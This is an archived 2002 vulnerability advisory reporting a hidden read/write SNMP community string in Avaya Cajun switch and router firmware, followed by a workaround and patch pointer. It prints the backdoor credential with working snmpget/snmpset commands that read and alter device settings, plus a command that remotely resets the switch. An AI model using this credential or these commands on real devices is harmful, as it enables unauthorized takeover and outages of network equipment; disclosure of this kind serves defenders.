TUCoPS :: Network Appliances :: napl5598.htm

Avaya Cajun firmware hidden SNMP community allows remote control

Better a bottle in front of me than a frontal lobotomy.

6th Aug 2002 [SBWID-5598]
COMMAND

	AVAYA Cajun firmware hidden SNMP community allows remote control

SYSTEMS AFFECTED

	 Avaya Cajun P330T software version 3.8.2 and 3.9.1

	 Avaya Cajun P333R software version 3.8.1 and 3.9.1

	

	 Additionaly firmware for P130, M770-ATM and M770 Supervisor (M-SPX, M-SPS)

	 was found to be vulnerable.

	

	 The vulnerability is also present on P333R router interfaces

PROBLEM

	Jacek   Lipkowski    [sq5bpf@andra.com.pl]    of    Andra    Co.    Ltd.
	[http://www.andra.com.pl] says :
	

	

	There exists an undocumented SNMP r/w community string in  firmware  for
	Avaya Cajun P33x series hardware. This allows anyone having SNMP  access
	to the device to administer  it.  Various  Cajun  firmware  contains  an
	undocumented community r/w string NoGaH$@! To test try:
	

	sq5bpf@hash:~$ snmpget 192.168.0.3 'NoGaH$@!' system.sysName.0

	system.sysName.0 = AsnNull

	sq5bpf@hash:~$ snmpset 192.168.0.3 'NoGaH$@!' system.sysName.0 s 'Hello there :)'

	system.sysName.0 = Hello there :)

	sq5bpf@hash:~$ snmpget 192.168.0.3 'NoGaH$@!' system.sysName.0

	system.sysName.0 = Hello there :)

	

	Reset a Cajun switch remotely (fun party trick):
	 

	sq5bpf@hash:~$ snmpset 192.168.0.3 'NoGaH$@!' .1.3.6.1.4.1.81.7.7.0 i 1

	enterprises.81.7.7.0 = 1

	

	P333R router :
	

	sq5bpf@hash:~$ snmpget 192.168.0.4 'NoGaH$@!' system.sysDescr.0

	system.sysDescr.0 = Avaya Inc. - P333R , SW version 3.9.1 , CS 2.4

	

SOLUTION

	 Workaround

	 ==========

	

	restrict SNMP access using the 'set allowed managers' command
	

	 Patch

	 =====

	

	Avaya support site http://support.avaya.com


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH